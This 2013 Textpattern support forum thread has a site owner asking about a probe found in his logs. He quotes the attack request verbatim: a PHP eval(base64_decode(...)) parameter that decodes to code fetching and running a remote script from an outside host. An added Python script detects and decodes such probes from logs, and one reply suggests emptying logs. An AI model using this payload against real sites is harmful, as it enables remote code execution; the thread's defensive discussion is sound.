Textpattern CMS support forum
Hack probing on my site detected
Here’s what I found last night in the logs:
First, someone came to my site from http://dr4g0n.name:8080/dokuwiki/doku.php?id=start, then from another IP came this request:
?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));
Should I arm already?
I also decoded this request from base64 to normal text; here’s the command: eval(file_get_contents('http://hw-cargo.ru/netcat_files/167/1.txt'));
You can check this txt yourself, it’s just a txt with a list of PHP commands.
So how can I check if my site is affected / infected?
Last edited by maratnugmanov (2013-03-31 12:54:46)
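One way to triage requests like the one in the post above, as an added example that is not part of the original thread: the script scans access-log lines for query parameters carrying eval(base64_decode(...)), decodes the argument for inspection without executing it, and reports the response status. The log lines, IP addresses and the find_probes name are constructed for illustration; only the base64 string comes from the post.

```python
import base64, binascii, re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in "combined" log format. The IPs are documentation
# addresses; only the base64 string is taken from the thread.
B64 = "ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7"
SAMPLE_LOG = [
    f'203.0.113.7 - - [31/Mar/2013:02:14:09 +0400] "GET /?text=eval(base64_decode({B64})); HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.23 - - [31/Mar/2013:02:15:40 +0400] "GET /articles/hello HTTP/1.1" 200 7312 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [31/Mar/2013:02:16:02 +0400] "GET /?q=eval%28base64_decode%28{B64}%29%29 HTTP/1.1" 404 312 "-" "-"',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')
PROBE_RE = re.compile(r'base64_decode\(\s*[\'"]?([A-Za-z0-9+/]+=*)')
URL_RE = re.compile(r'https?://[^\s\'")]+')

def find_probes(lines):
    """Return one record per query parameter carrying eval(base64_decode(...))."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, when, target, status = m.groups()
        for pair in urlsplit(target).query.split('&'):
            name, _, raw = pair.partition('=')
            probe = PROBE_RE.search(unquote(raw))  # also catches %28-encoded forms
            if not probe:
                continue
            b64 = probe.group(1)
            try:
                # Decode only for inspection; the result is never executed.
                data = base64.b64decode(b64 + '=' * (-len(b64) % 4), validate=True)
            except binascii.Error:
                data = b''
            text = data.decode('utf-8', 'replace')
            # A 200 status only means a page was served, not that the code ran.
            hits.append({'ip': ip, 'time': when, 'param': name, 'status': int(status),
                         'decoded': text, 'urls': URL_RE.findall(text)})
    return hits

if __name__ == '__main__':
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

The parameter names it reports can then be checked against the parameters the site's own templates and plugins actually read.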
Re: Hack probing on my site detected
That doesn’t look like anything specific to Textpattern. It may be a question more appropriate for your web hosting company.
Re: Hack probing on my site detected
So Textpattern is not affected by such a request?
Re: Hack probing on my site detected
maratnugmanov wrote:
So Textpattern is not affected by such a request?
No mention of Textpattern in the code you posted.
Who is your ISP, i.e. where is your site hosted? Have you asked their support staff to investigate?
Empty your log file, and double-check all the permissions on your files.
Do you have comments turned on?
Last edited by bici (2013-04-01 05:16:06)
…. texted postive
Re: Hack probing on my site detected
I mean that I saw some videos of using vulnerabilities in WordPress and Joomla, using such commands, so the question is simple – is Textpattern vulnerable to such attacks?
Comments are on, but I don’t have any – the site is too young.
The command looks like this; it contains instructions to include PHP commands. The question is – will Textpattern try to execute those?
http://mysite.com/?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2h3LWNhcmdvLnJ1L25ldGNhdF9maWxlcy8xNjcvMS50eHQnKSk7));
I don’t think I should contact my hoster every time someone tries to use WordPress hacks on me. They just shouldn’t work.
For example, I can try to run this command on your website (which I wouldn’t do, I’m just giving an example), just by adding this to your site URL. Will you immediately contact your hoster? And how can he protect you from this random stuff? He can blacklist some IPs etc., but I don’t think there is much to investigate.
Last edited by maratnugmanov (2013-04-01 08:26:17)
Re: Hack probing on my site detected
Hi Marat.
If the website you are referring to is hw-cargo.ru, there are nearly 1,5000 websites on the same web server, so it’s very likely another website has compromised security. If you contact your host, there may be cleanup on other sites that is required. I agree with Giovanni, there is no mention of Textpattern in the code you posted, although since the files folder has more liberal file permissions it’s possible another website on the same server has found the files folder has 777 permissions and just used that.
I suggest deleting the 1.txt file, changing the file permissions on the files folder to 755 until the problem is solved with the rogue site.
Re: Hack probing on my site detected
This seems like it could affect Textpattern if you are not sanitizing your GET variables, and happen to be using a variable called “text”. :-)
Re: Hack probing on my site detected
After my request to remove 1.txt from the first site, it was removed, but no luck – now an almost similar request is coming from another site. I already wrote about that to the possible domain registrar and possible hoster, but this time it is 100% not an infected site – it is the nest itself – the main page of the domain has malicious code, and all subdomains too – they want you to install Adobe Flash Player, and some scripts change the page address to Adobe’s to fool you.
+100 for Textpattern that it is not as common as WordPress – I don’t think that I will be affected any time soon.